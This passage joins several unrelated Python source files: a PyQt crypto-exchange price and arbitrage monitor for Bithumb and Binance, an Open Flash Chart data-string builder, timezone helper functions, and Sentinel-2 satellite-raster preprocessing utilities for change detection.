            #print("Bithumb Price of " + kindofcoine + "\n");
            bithumb_rgParams["order_currency"] = kindofcoine;
            #print(bithumb_rgParams);
            coin = "/public/ticker/" + kindofcoine;
            #coin = "/public/ticker/all";
            #print("Bithumb Price of " + bithumb_rgParams["order_currency"]);
            ret = connection.xcoinApiCall(coin, bithumb_rgParams);
        elif (kindofexchange == "Binance") :
            #print("get_orderbook_ticker\n");
            ret = connection.get_orderbook_ticker(symbol=kindofcoine);
        else:
            ret = 0;
        return ret;
    def coin_pricecheck(self):
        """Refresh prices from both exchanges, recompute ETH ratios and the
        expected coin counts after transferring each coin A->B and B->A,
        then update the UI. Runs on a background thread (see coin_timer)."""
        # get coin price from Binance Exchange
        bApi = self.getConnection("Binance");
        self.exchg.infoB["Exchange"] = "Binance";
        index = 0;
        for i in coin_binance:
            result = self.getCryptoCurrencyPrice(bApi, "Binance", i);
            j = coin_map[i];
            index += 1;
            #print("coin/eth = ", j + "--> sell: " + result["bidPrice"]);
            if(j == "ETH") :
                self.exchg.infoB["Cur_Price"][j] = float(result["bidPrice"]);
                self.exchg.infoB["ETH_Ratio"][j] = 1;
            else :
                self.exchg.infoB["Cur_Price"][j] = float(self.exchg.infoB["Cur_Price"]["ETH"]) * float(result["bidPrice"]);
                self.exchg.infoB["ETH_Ratio"][j] = float(result["bidPrice"]);
                self.exchg.infoB["ETH_Cnt"][j] = self.exchg.infoB["Coin_Cnt"][j] * self.exchg.infoB["ETH_Ratio"][j];
        # get coin price from Bithumb Exchange
        aApi = self.getConnection("Bithumb");
        self.exchg.infoA["Exchange"] = "Bithumb";
        for i in coin:
            result = self.getCryptoCurrencyPrice(aApi, "Bithumb", i);
            if(result["status"] == "0000"):
                #print("coin = ", i + "--> sell: " + result["data"]["sell_price"]);
                self.exchg.infoA["Cur_Price"][i] = float(result["data"]["sell_price"]);
                if(i == "ETH") :
                    self.exchg.infoA["ETH_Ratio"][i] = 1;
                    continue
                else :
                    self.exchg.infoA["ETH_Ratio"][i] = float(self.exchg.infoA["Cur_Price"][i]) / float(self.exchg.infoA["Cur_Price"]["ETH"]);
                    self.exchg.infoA["ETH_Cnt"][i] = self.exchg.infoA["Coin_Cnt"][i] * self.exchg.infoA["ETH_Ratio"][i];
        # Calculate Transfer profit
        for i in coin:
            if(i == "ETH") :
                self.exchg.infoA["Result_Cnt"][i] = 1;
            else :
                # 0.995 factor: presumably a 0.5% transfer/trade fee — TODO confirm.
                self.exchg.infoA["Result_Cnt"][i] = (self.exchg.infoA["ETH_Cnt"][i] * 0.995) / self.exchg.infoB["ETH_Ratio"][i];
                self.exchg.infoA["Profit_Cnt"][i] = self.exchg.infoA["Result_Cnt"][i] - self.exchg.infoA["Coin_Cnt"][i];
        index = 0;
        for i in coin_binance:
            j = coin_map[i];
            index += 1;
            if(j == "ETH") :
                self.exchg.infoB["Result_Cnt"][j] = 1;
            else :
                self.exchg.infoB["Result_Cnt"][j] = (self.exchg.infoB["ETH_Cnt"][j] * 0.995) / self.exchg.infoA["ETH_Ratio"][j];
                self.exchg.infoB["Profit_Cnt"][j] = self.exchg.infoB["Result_Cnt"][j] - self.exchg.infoB["Coin_Cnt"][j];
        print("==================================");
        print("Bithumb --> Binance : ", self.exchg.infoA["Profit_Cnt"]["EOS"]);
        print("Binance --> Bithumb : ", self.exchg.infoB["Profit_Cnt"]["EOS"]);
        print("==================================");
        self.coinview_Update();
        pass
    def coinview_Update(self):
        """Copy the computed model values into the LCD widgets.

        NOTE(review): called from a worker thread — Qt widgets are normally
        main-thread-only; confirm this is safe or route through a signal.
        """
        print("Call coinview_Update");
        # expected arbitrage profit (coin count delta)
        self.EOS_Diff.display(self.exchg.infoA["Profit_Cnt"]["EOS"]);
        self.ETC_Diff.display(self.exchg.infoA["Profit_Cnt"]["ETC"]);
        self.LTC_Diff.display(self.exchg.infoA["Profit_Cnt"]["LTC"]);
        self.XMR_Diff.display(self.exchg.infoA["Profit_Cnt"]["XMR"]);
        self.QTUM_Diff.display(self.exchg.infoA["Profit_Cnt"]["QTUM"]);
        self.ZEC_Diff.display(self.exchg.infoA["Profit_Cnt"]["ZEC"]);
        self.XRP_Diff.display(self.exchg.infoA["Profit_Cnt"]["XRP"]);
        self.DASH_Diff.display(self.exchg.infoA["Profit_Cnt"]["DASH"]);
        self.Src_ETH_Price.display(self.exchg.infoA["Cur_Price"]["ETH"]);
        self.Src_EOS_Price.display(self.exchg.infoA["Cur_Price"]["EOS"]);
        self.Src_ETC_Price.display(self.exchg.infoA["Cur_Price"]["ETC"]);
        self.Src_LTC_Price.display(self.exchg.infoA["Cur_Price"]["LTC"]);
        self.Src_XMR_Price.display(self.exchg.infoA["Cur_Price"]["XMR"]);
        self.Src_QTUM_Price.display(self.exchg.infoA["Cur_Price"]["QTUM"]);
        self.Src_ZEC_Price.display(self.exchg.infoA["Cur_Price"]["ZEC"]);
        self.Src_XRP_Price.display(self.exchg.infoA["Cur_Price"]["XRP"]);
        self.Src_DASH_Price.display(self.exchg.infoA["Cur_Price"]["DASH"]);
        self.Src_EOSETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["EOS"]);
        self.Src_ETCETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["ETC"]);
        self.Src_LTCETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["LTC"]);
        self.Src_XMRETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["XMR"]);
        self.Src_QTUMETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["QTUM"]);
        self.Src_ZECETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["ZEC"]);
        self.Src_XRPETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["XRP"]);
        self.Src_DASHETH_Ratio.display(self.exchg.infoA["ETH_Ratio"]["DASH"]);
        # expected coin count after the arbitrage transfer
        self.Dst_EOS_TCnt.display(self.exchg.infoA["Result_Cnt"]["EOS"]);
        self.Dst_ETC_TCnt.display(self.exchg.infoA["Result_Cnt"]["ETC"]);
        self.Dst_LTC_TCnt.display(self.exchg.infoA["Result_Cnt"]["LTC"]);
        self.Dst_XMR_TCnt.display(self.exchg.infoA["Result_Cnt"]["XMR"]);
        self.Dst_QTUM_TCnt.display(self.exchg.infoA["Result_Cnt"]["QTUM"]);
        self.Dst_ZEC_TCnt.display(self.exchg.infoA["Result_Cnt"]["ZEC"]);
        self.Dst_XRP_TCnt.display(self.exchg.infoA["Result_Cnt"]["XRP"]);
        self.Dst_DASH_TCnt.display(self.exchg.infoA["Result_Cnt"]["DASH"]);
        # expected arbitrage profit as a percentage of the starting count
        self.EOS_PRatio.display(self.exchg.infoA["Profit_Cnt"]["EOS"]*100/self.exchg.infoA["Coin_Cnt"]["EOS"]);
        self.ETC_PRatio.display(self.exchg.infoA["Profit_Cnt"]["ETC"]*100/self.exchg.infoA["Coin_Cnt"]["ETC"]);
        self.LTC_PRatio.display(self.exchg.infoA["Profit_Cnt"]["LTC"]*100/self.exchg.infoA["Coin_Cnt"]["LTC"]);
        self.XMR_PRatio.display(self.exchg.infoA["Profit_Cnt"]["XMR"]*100/self.exchg.infoA["Coin_Cnt"]["XMR"]);
        self.QTUM_PRatio.display(self.exchg.infoA["Profit_Cnt"]["QTUM"]*100/self.exchg.infoA["Coin_Cnt"]["QTUM"]);
        self.ZEC_PRatio.display(self.exchg.infoA["Profit_Cnt"]["ZEC"]*100/self.exchg.infoA["Coin_Cnt"]["ZEC"]);
        self.XRP_PRatio.display(self.exchg.infoA["Profit_Cnt"]["XRP"]*100/self.exchg.infoA["Coin_Cnt"]["XRP"]);
        self.DASH_PRatio.display(self.exchg.infoA["Profit_Cnt"]["DASH"]*100/self.exchg.infoA["Coin_Cnt"]["DASH"]);
        self.Dst_ETH_Price.display(self.exchg.infoB["Cur_Price"]["ETH"]);
        self.Dst_EOS_Price.display(self.exchg.infoB["Cur_Price"]["EOS"]);
        self.Dst_ETC_Price.display(self.exchg.infoB["Cur_Price"]["ETC"]);
        self.Dst_LTC_Price.display(self.exchg.infoB["Cur_Price"]["LTC"]);
        self.Dst_XMR_Price.display(self.exchg.infoB["Cur_Price"]["XMR"]);
        self.Dst_QTUM_Price.display(self.exchg.infoB["Cur_Price"]["QTUM"]);
        self.Dst_ZEC_Price.display(self.exchg.infoB["Cur_Price"]["ZEC"]);
        self.Dst_XRP_Price.display(self.exchg.infoB["Cur_Price"]["XRP"]);
        self.Dst_DASH_Price.display(self.exchg.infoB["Cur_Price"]["DASH"]);
        self.Dst_EOSETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["EOS"]);
        self.Dst_ETCETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["ETC"]);
        self.Dst_LTCETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["LTC"]);
        self.Dst_XMRETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["XMR"]);
        self.Dst_QTUMETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["QTUM"]);
        self.Dst_ZECETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["ZEC"]);
        self.Dst_XRPETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["XRP"]);
        self.Dst_DASHETH_Ratio.display(self.exchg.infoB["ETH_Ratio"]["DASH"]);
    def coin_timer(self, mode, count, period):
        """Price-check driver: 'oneshot' runs once, 'refresh' runs `count`
        times every `period` seconds, 'infinite' loops forever."""
        #print("Timer option is " + str(mode) + "Period = " + str(period));
        if(mode == "oneshot"):
            self.coin_pricecheck();
        elif (mode == "refresh"):
            i = 0;
            while i < count:
                #print("Timer Call = ", i);
                self.coin_pricecheck();
                time.sleep(period);
                i += 1;
        elif (mode == "infinite"):
            while True:
                self.coin_pricecheck();
                time.sleep(period);
        else:
            print("Timer option error\n");
    def coin_timer_start(self):
        """Kick off the infinite price-refresh loop 1 second from now."""
        #threading.Timer(delay, func, args=[params,]) - runs func after delay seconds
        #timer2 = threading.Timer(10, self.coin_timer, args=['infinite', 5, 10]);
        self.timer = threading.Timer(1, self.coin_timer, args=['infinite', 5, 10]);
        self.timer.start();
    def get_curtime_timer(self, period):
        """Clock loop: write the current HH:MM:SS into the UI every `period` seconds."""
        while True:
            myTime = time.strftime('%H:%M:%S');
            #print(myTime);
            self.cur_time.setText(str(myTime));
            time.sleep(period);
    def get_curtime_start(self):
        """Start the clock-update loop 1 second from now."""
        #threading.Timer(delay, func, args=[params,]) - runs func after delay seconds
        #timer2 = threading.Timer(10, self.coin_timer, args=['infinite', 5, 10]);
        self.timetimer = threading.Timer(1, self.get_curtime_timer, args=[1]);
        self.timetimer.start();
if __name__ == "__main__":
    # Create the Qt application, show the main window and enter the event loop.
    app = QApplication(sys.argv);
    myWindow = MyWindow();
    myWindow.show();
    app.exec_();
# Timer 10 sec
#timer = threading.Thread(name='time', target=coin_timer, args=('infinite', 5, 30));
#timer.start();
#https://api.binance.com/api//ticker/bookTicker
#https://api.binance.com/api/v1/ticker/24hr
'''
# Create Thread
def theradfunc(param1, param2):
print("==================================");
print("threadfunc create = ", param1, param2);
print("==================================");
pass
jobb = threading.Thread(name="jobb", target=theradfunc, args=(1, 100000));
jobb.start();
class bithumb:
urlTicker = urllib.request.urlopen('https://api.bithumb.com/public/ticker/all')
headers = { 'User-Agent' : 'Mozilla/5.0' }
readTicker = urlTicker.read()
jsonTicker = json.loads(readTicker)
FindBTC = jsonTicker['data']['BTC']['sell_price']
BTC = int(FindBTC)
FindETH = jsonTicker['data']['ETH']['sell_price']
ETH = int(FindETH)
FindDASH = jsonTicker['data']['DASH']['sell_price']
DASH = int(FindDASH)
FindLTC = jsonTicker['data']['LTC']['sell_price']
LTC = int(FindLTC)
FindETC = jsonTicker['data']['ETC']['sell_price']
ETC = int(FindETC)
FindXRP = jsonTicker['data']['XRP']['sell_price']
XRP = int(FindXRP)
if(result["status"] == "0000"):
#print(result);
print("status: " + result["status"]);
print("sell: " + result["data"]["sell_price"]);
print("buy: " + result["data"]["buy_price"]);
exchg = Exchange();
exchg.infoA["Exchange"] = "Bithumb";
exchg.infoB["Exchange"] = "Binance";
print(exchg.infoA);
print(exchg.infoB);
#print("Binance Price of " + kindofcoine + "\n");
#ret = connection.get_all_orders(symbol='BNBBTC', requests_params={'timeout': 5});
#print(ret);
#ret = connection.get_symbol_info('EOSETH');
#print(ret);
print("get_all_tickers\n");
ret = connection.get_all_tickers();
print(ret);
print("\n");
print("get_symbol_ticker\n");
ret = connection.get_symbol_ticker(symbol='EOSETH');
print(ret);
print("\n");
#ret = connection.get_exchange_info();
#print(ret);
print("\n");
'''
|
class Graph:
    """Builder for Open Flash Chart data strings.

    Each setter records one chart option; render() concatenates them into the
    '&key=value&' (CRLF-separated) format consumed by the Flash component.
    """
    def __init__(self):
        self.data = []
        self.x_labels = []
        self.y_min = 0
        self.y_max = 20
        self.y_steps = 5
        self.title_text = ''
        self.title_size = 30
        # Default title colour so render() never reads an unset attribute when
        # title() was called with an empty colour string.
        self.title_colour = '#000000'
        # Bug fix: the original assigned self.pie = 0 here, which shadowed the
        # pie() method on every instance and made the pie API uncallable
        # (TypeError: 'int' object is not callable); pie_values() had the same
        # self-shadowing problem.  Pie state now lives in underscored attributes.
        self._pie = ''
        self._pie_values = ''
        self._pie_labels = ''
        self._pie_colours = ''
        self.x_tick_size = -1
        # GRID styles:
        self.x_axis_colour = ''
        self.x_grid_colour = ''
        self.y_axis_colour = ''
        self.y_grid_colour = ''
        self.x_axis_steps = 1
        # AXIS LABEL styles:
        self.x_label_style_size = -1
        self.x_label_style_colour = '#000000'
        self.x_label_style_orientation = 0
        self.x_label_style_step = 1
        self.y_label_style_size = -1
        self.y_label_style_colour = '#000000'
        # AXIS LEGEND styles:
        self.x_legend = ''
        self.x_legend_size = 20
        self.x_legend_colour = '#000000'
        self.y_legend = ''
        self.y_legend_size = 20
        self.y_legend_colour = '#000000'
        self.lines = []
        self.line_default = '&line=3,#87421F&' + "\r\n"
        self.bg_colour = ''
        self.bg_image = ''
        self.inner_bg_colour = ''
        self.inner_bg_colour_2 = ''
        self.inner_bg_angle = ''
    def set_data( self, a ):
        """Add one data series; the first is '&values=', later ones '&values_N='."""
        if( len( self.data ) == 0 ):
            self.data.append( '&values=%s&\r\n' % ','.join([str(v) for v in a]) )
        else:
            self.data.append( '&values_%s=%s&\r\n' % (len(self.data)+1, ','.join([str(v) for v in a])) )
    def set_x_labels( self, a ):
        """Set the x-axis tick labels (sequence of strings)."""
        self.x_labels = a
    def set_x_label_style( self, size, colour='', orientation=0, step=-1 ):
        """Style the x labels; colour/orientation/step are only applied when set."""
        self.x_label_style_size = size
        if( len( colour ) > 0 ):
            self.x_label_style_colour = colour
        if( orientation > 0 ):
            self.x_label_style_orientation = orientation
        if( step > 0 ):
            self.x_label_style_step = step
    def set_bg_colour( self, colour ):
        """Set the chart background colour (e.g. '#FFFFFF')."""
        self.bg_colour = colour
    def set_bg_image( self, url, x='center', y='center' ):
        """Set a background image URL and its x/y placement."""
        self.bg_image = url
        self.bg_image_x = x
        self.bg_image_y = y
    def set_inner_background( self, col, col2='', angle=-1 ):
        """Set the plot-area background; col2 + angle enable a gradient."""
        self.inner_bg_colour = col
        if( len(col2) > 0 ):
            self.inner_bg_colour_2 = col2
        if( angle != -1 ):
            self.inner_bg_angle = angle
    def set_y_label_style( self, size, colour='' ):
        """Style the y labels; colour is only applied when non-empty."""
        self.y_label_style_size = size
        if( len( colour ) > 0 ):
            self.y_label_style_colour = colour
    def set_y_max( self, max ):
        """Set the y-axis maximum (coerced to int)."""
        self.y_max = int( max )
    def set_y_min( self, min ):
        """Set the y-axis minimum (coerced to int)."""
        self.y_min = int( min )
    def y_label_steps( self, val ):
        """Set how many y-axis label steps are drawn."""
        self.y_steps = int( val )
    def title( self, title, size=-1, colour='#000000' ):
        """Set the chart title, optional font size and colour."""
        self.title_text = title
        if( size > 0 ):
            self.title_size = size
        if( len( colour ) > 0 ):
            self.title_colour = colour
    def set_x_legend( self, text, size=-1, colour='' ):
        """Set the x-axis legend text, optional size and colour."""
        self.x_legend = text
        if( size > -1 ):
            self.x_legend_size = size
        if( len( colour )>0 ):
            self.x_legend_colour = colour
    def set_x_tick_size( self, size ):
        """Set the x tick length (ignored unless positive)."""
        if( size > 0 ):
            self.x_tick_size = size
    def set_x_axis_steps( self, steps ):
        """Set how many values sit between drawn x-axis ticks (ignored unless positive)."""
        if ( steps > 0 ):
            self.x_axis_steps = steps
    def set_y_legend( self, text, size=-1, colour='' ):
        """Set the y-axis legend text, optional size and colour."""
        self.y_legend = text
        if( size > -1 ):
            self.y_legend_size = size
        if( len( colour )>0 ):
            self.y_legend_colour = colour
    def line( self, width, colour='', text='', size=-1, circles=-1 ):
        """Add a plain line style for the matching data series."""
        tmp = '&line'
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += '='
        if( width > 0 ):
            tmp += "%s,%s" % (width, colour)
        if( len( text ) > 0 ):
            tmp += ',%s,%s' % (text,size)
        if( circles > 0 ):
            tmp += ',%s' % circles
        tmp += "&\r\n"
        self.lines.append( tmp )
    def line_dot( self, width, dot_size, colour, text='', font_size=0 ):
        """Add a dotted-line style for the matching data series."""
        tmp = '&line_dot'
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += "=%s,%s,%s" % (width,colour,text)
        if( font_size > 0 ):
            tmp += ",%s,%s" % (font_size,dot_size)
        tmp += "&\r\n"
        self.lines.append( tmp )
    def line_hollow( self, width, dot_size, colour, text='', font_size=0 ):
        """Add a hollow-dot line style for the matching data series."""
        tmp = '&line_hollow'
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += "=%s,%s,%s" % (width,colour,text)
        if( font_size > 0 ):
            tmp += ",%s,%s" % (font_size,dot_size)
        tmp += "&\r\n"
        self.lines.append( tmp )
    def area_hollow( self, width, dot_size, colour, alpha, text='', font_size=0, fill_color='' ):
        """Add a hollow-area style for the matching data series."""
        tmp = '&area_hollow'
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += "=%s,%s,%s,%s" % (width,dot_size,colour,alpha)
        if( len( text ) > 0 ):
            tmp += ",%s,%s" % (text,font_size)
        if( len( fill_color ) > 0 ):
            tmp += ",%s" % (fill_color)
        tmp += "&\r\n"
        self.lines.append( tmp )
    def bar( self, alpha, colour='', text='', size=-1 ):
        """Add a plain bar style for the matching data series."""
        tmp = '&bar'
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += '='
        tmp += "%s,%s,%s,%s" % (alpha,colour,text,size)
        tmp += "&\r\n"
        self.lines.append( tmp )
    def bar_glass( self, alpha, colour, outline_colour, text='', size=-1 ):
        """Add a glass-effect bar style for the matching data series."""
        tmp = '&bar_glass';
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += '='
        tmp += "%s,%s,%s,%s,%s" % (alpha,colour,outline_colour,text,size)
        tmp += "&"
        self.lines.append( tmp )
    def bar_filled( self, alpha, colour, colour_outline, text='', size=-1 ):
        """Add a filled bar style for the matching data series."""
        tmp = '&filled_bar'
        if( len( self.lines ) > 0 ):
            tmp += '_%s' % (len( self.lines )+1)
        tmp += "=%s,%s,%s,%s,%s&\r\n" % (alpha,colour,colour_outline,text,size)
        self.lines.append( tmp )
    def fx_axis_colour( self, axis, grid='' ):
        """Set the x-axis line colour and optional grid colour."""
        self.x_axis_colour = axis
        self.x_grid_colour = grid
    def fy_axis_colour( self, axis, grid='' ):
        """Set the y-axis line colour and optional grid colour."""
        self.y_axis_colour = axis
        self.y_grid_colour = grid
    def pie(self, alpha, line_colour, label_colour ):
        """Switch the chart to pie mode with the given alpha and colours."""
        self._pie = str(alpha) + ',' + line_colour + ',' + label_colour
    def pie_values(self, values, labels):
        """Set the pie slice values and their labels."""
        self._pie_values = ','.join([str(v) for v in values])
        self._pie_labels = ','.join([str(v) for v in labels])
    def pie_slice_colours(self, colours):
        """Set the per-slice colours for a pie chart."""
        self._pie_colours = ','.join([str(v) for v in colours])
    def set_tool_tip(self, tip):
        """Set the hover tool-tip template string."""
        self.tool_tip = tip
    def render( self ):
        """Serialize all configured options into one OFC data string."""
        #tmp = "&padding=70,5,50,40&\r\n"
        tmp = ''
        if( len( self.title_text ) > 0 ):
            tmp += '&title=%s,%s,%s&\r\n' % (self.title_text,self.title_size,self.title_colour)
        if( len( self.x_legend ) > 0 ):
            tmp += '&x_legend=%s,%s,%s\r\n' % (self.x_legend,self.x_legend_size,self.x_legend_colour)
        if( self.x_label_style_size > 0 ):
            tmp += '&x_label_style=%s,%s,%s,%s&\r\n' % (self.x_label_style_size,self.x_label_style_colour,self.x_label_style_orientation,self.x_label_style_step)
        if( self.x_tick_size > 0 ):
            tmp += "&x_ticks=%s&\r\n" % self.x_tick_size
        if( self.x_axis_steps > 0 ):
            tmp += "&x_axis_steps=%s&\r\n" % self.x_axis_steps
        if( len( self.y_legend ) > 0 ):
            tmp += '&y_legend=%s,%s,%s&\r\n' % (self.y_legend,self.y_legend_size,self.y_legend_colour)
        if( self.y_label_style_size > 0 ):
            tmp += "&y_label_style=%s,%s&\r\n" % (self.y_label_style_size,self.y_label_style_colour)
        tmp += '&y_ticks=5,10,%s&\r\n' % self.y_steps
        if( len( self.lines ) == 0 ):
            tmp += self.line_default
        else:
            for line in self.lines:
                tmp += line
        for data in self.data:
            tmp += data
        if( len( self.x_labels ) > 0 ):
            tmp += '&x_labels=%s&\r\n' % ",".join(self.x_labels)
        tmp += '&y_min=%s&\r\n' % self.y_min
        tmp += '&y_max=%s&\r\n' % self.y_max
        if( len( self.bg_colour ) > 0 ):
            tmp += '&bg_colour=%s&\r\n' % self.bg_colour
        if( len( self.bg_image ) > 0 ):
            tmp += '&bg_image=%s&\r\n' % self.bg_image
            tmp += '&bg_image_x=%s&\r\n' % self.bg_image_x
            tmp += '&bg_image_y=%s&\r\n' % self.bg_image_y
        if( len( self.x_axis_colour ) > 0 ):
            tmp += '&x_axis_colour=%s&\r\n' % self.x_axis_colour
            tmp += '&x_grid_colour=%s&\r\n' % self.x_grid_colour
        if( len( self.y_axis_colour ) > 0 ):
            tmp += '&y_axis_colour=%s&\r\n' % self.y_axis_colour
            tmp += '&y_grid_colour=%s&\r\n' % self.y_grid_colour
        if( len( self.inner_bg_colour ) > 0 ):
            tmp += '&inner_background=%s' % self.inner_bg_colour
            if( len( self.inner_bg_colour_2 ) > 0 ):
                tmp += ',%s,%s' % ( self.inner_bg_colour_2, self.inner_bg_angle )
            tmp += "&\r\n"
        if( len( self._pie ) > 0 ):
            tmp += '&pie=' + self._pie + '&'
            tmp += '&values=' + self._pie_values + '&'
            tmp += '&pie_labels=' + self._pie_labels + '&'
            tmp += '&colours=' + self._pie_colours + '&'
        return tmp
|
import datetime
import pytz
from dateutil import relativedelta
# Module-level timezone singletons shared by the helpers below.
UTC_TZ = pytz.timezone('UTC')
EASTERN_TZ = pytz.timezone('US/Eastern')
# Timezones are way harder than one would imagine.
# from betterself.utils import date_utils
def get_datetime_in_eastern_timezone(year, month, day, hour, minute, second=0):
    """Build a timezone-aware US/Eastern datetime for the given wall-clock fields.

    Bug fix: passing a pytz zone via ``tzinfo=`` in the datetime constructor
    attaches the zone's raw LMT offset (-04:56 for US/Eastern) instead of the
    correct EST/EDT offset for that date; pytz requires ``localize()`` to
    resolve the proper offset.
    """
    naive = datetime.datetime(year, month, day, hour, minute, second)
    return EASTERN_TZ.localize(naive)
def get_current_utc_time_and_tz():
    """Return the current moment as a timezone-aware UTC datetime.

    Unlike ``datetime.utcnow()``, the result carries tzinfo (pytz.UTC).
    """
    utc_now = datetime.datetime.now(tz=pytz.UTC)
    return utc_now
def get_current_usertime(user):
    """Current wall-clock time in the user's configured timezone (tz-aware)."""
    return datetime.datetime.now(tz=user.pytz_timezone)
def get_current_userdate(user):
    """Today's calendar date as seen in the user's timezone."""
    local_now = get_current_usertime(user)
    return local_now.date()
def days_ago_from_current_day(days):
    """Return a timezone-aware UTC datetime exactly `days` days before now."""
    # Attach UTC tzinfo explicitly — naive datetimes trigger warnings downstream.
    utc_now = UTC_TZ.localize(datetime.datetime.utcnow())
    return utc_now - relativedelta.relativedelta(days=days)
def get_current_date_months_ago(months):
    """Calendar date `months` months before today."""
    return datetime.date.today() - relativedelta.relativedelta(months=months)
def get_current_date_years_ago(years):
    """Calendar date `years` years before today."""
    return datetime.date.today() - relativedelta.relativedelta(years=years)
def get_current_date_days_ago(days_ago):
    """Calendar date `days_ago` days before today."""
    return datetime.date.today() - relativedelta.relativedelta(days=days_ago)
def get_midnight_datetime_from_date_parameter(user, date):
    """Convert a plain date into a tz-aware datetime at the user's local midnight."""
    midnight = datetime.datetime.combine(date, datetime.time.min)
    return user.pytz_timezone.localize(midnight)
|
# coding: utf-8
"""
Main functions to preprocess Sentinel-2 Datasets for Change Detection purpose
@Author: Tony Di Pilato
Created on Wed Feb 19, 2020
"""
import os
import numpy as np
from osgeo import osr
from osgeo import gdal
import random
def build_raster(folder, channels):
    """Stack selected Sentinel-2 band GeoTIFFs from `folder` into an (H, W, C) array.

    `channels` picks a predefined band subset: 3 (RGB), 4 (10 m),
    7 (10 m + 60 m), 10 (10 m + 20 m) or 13 (full raster).
    """
    band_sets = {
        3: ['B02', 'B03', 'B04'],                                  # RGB
        4: ['B02', 'B03', 'B04', 'B08'],                           # 10m resolution
        7: ['B01', 'B02', 'B03', 'B04', 'B08', 'B09', 'B10'],      # 10m + 60m resolution
        10: ['B02', 'B03', 'B04', 'B05', 'B06', 'B07', 'B08', 'B8A', 'B11', 'B12'],  # 10m + 20m resolution
        13: ['B01', 'B02', 'B03', 'B04', 'B05', 'B06', 'B07', 'B08', 'B8A', 'B09', 'B10', 'B11', 'B12'],  # full raster
    }
    layers = []
    for band_name in band_sets[channels]:
        layers.append(gdal.Open(folder + band_name + '.tif').ReadAsArray())
    return np.stack(layers, axis=2)
def build_raster_fromMultispectral(dataset, channels):
    """Stack the band subset for `channels` from an open multispectral dataset
    into an (H, W, C) array; band indices are 1-based as GDAL expects."""
    band_num = {
        3: [2, 3, 4],                           # RGB
        4: [2, 3, 4, 8],                        # 10m resolution
        7: [1, 2, 3, 4, 8, 10, 11],             # 10m + 60m resolution
        10: [2, 3, 4, 5, 6, 7, 8, 9, 12, 13],   # 10m + 20m resolution
        13: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13],
    }
    layers = []
    for b in band_num[channels]:
        layers.append(dataset.GetRasterBand(b).ReadAsArray())
    return np.stack(layers, axis=2)
def pad(img, crop_size):
    """Zero-pad `img` on the bottom/right up to the next multiple of crop_size.

    Note: a dimension already divisible by crop_size still gains a full extra
    crop_size of padding (matches the downstream tiling logic).
    """
    h, w, _ = img.shape
    extra_h = (h // crop_size + 1) * crop_size - h
    extra_w = (w // crop_size + 1) * crop_size - w
    return np.pad(img, [(0, extra_h), (0, extra_w), (0, 0)], mode='constant')
def crop(img, crop_size, stride):
    """Slide a crop_size window over `img` with the given stride.

    Only full-size tiles are kept; partial tiles at the borders are dropped.
    """
    h, w, c = img.shape
    tiles = []
    for row in range(int(h / stride)):
        for col in range(int(w / stride)):
            y0, x0 = row * stride, col * stride
            tile = img[y0:y0 + crop_size, x0:x0 + crop_size, :]
            if tile.shape == (crop_size, crop_size, c):
                tiles.append(tile)
    return tiles
def uncrop(shape, crops, crop_size, stride):
    """Reassemble tiles produced by crop() back into an array of `shape`.

    Tiles are consumed in row-major order; with stride < crop_size, later
    tiles overwrite the overlapping region of earlier ones.
    """
    out = np.zeros(shape)
    h, w, _ = shape
    n_h = int(h / stride)
    n_w = int(w / stride)
    for idx in range(n_h * n_w):
        row, col = divmod(idx, n_w)
        y0, x0 = row * stride, col * stride
        out[y0:y0 + crop_size, x0:x0 + crop_size, :] = crops[idx]
    return out
def unpad(shape, img):
    """Trim a padded image back to the original (h, w) taken from `shape`."""
    h, w, _ = shape
    return img[:h, :w, :]
def getCoord(geoTiff):
    """Return the [ulx, uly, lrx, lry] bounding box of a GDAL dataset.

    The geotransform rotation terms are ignored (assumes a north-up raster).
    """
    ulx, px_width, _rot_x, uly, _rot_y, px_height = geoTiff.GetGeoTransform()
    lrx = ulx + geoTiff.RasterXSize * px_width
    lry = uly + geoTiff.RasterYSize * px_height
    return [ulx, uly, lrx, lry]
def createGeoCM(cmName, geoTiff, cmArray):
    """Write `cmArray` as a single-band byte GeoTIFF named `cmName`,
    copying geotransform and projection from the reference dataset `geoTiff`."""
    ulx, pixelWidth, rot_x, uly, rot_y, pixelHeight = geoTiff.GetGeoTransform()
    if cmArray.ndim == 3:
        # Drop a singleton band axis so WriteArray gets a 2-D map.
        cmArray = np.squeeze(cmArray)
    rows, cols = cmArray.shape[0], cmArray.shape[1]
    driver = gdal.GetDriverByName('GTiff')
    out_raster = driver.Create(cmName, cols, rows, 1, gdal.GDT_Byte)
    out_raster.SetGeoTransform((int(ulx), pixelWidth, rot_x, int(uly), rot_y, pixelHeight))
    out_band = out_raster.GetRasterBand(1)
    out_band.WriteArray(cmArray)
    # Carry over the spatial reference so the change map stays georeferenced.
    srs = osr.SpatialReference(wkt=geoTiff.GetProjection())
    out_raster.SetProjection(srs.ExportToWkt())
    out_band.FlushCache()
def trim(img, x, y, crop_size):
    """Extract a crop_size x crop_size patch whose top-left corner is (x, y)."""
    return img[x:x + crop_size, y:y + crop_size, :]
def random_transform(img, val):
    """Apply one of six deterministic augmentations selected by `val`:
    0 identity, 1-3 rotation by val*90 degrees, 4 vertical flip, 5 horizontal flip.
    Raises KeyError for any other value, like the dict dispatch it replaces."""
    if val == 0:
        return img
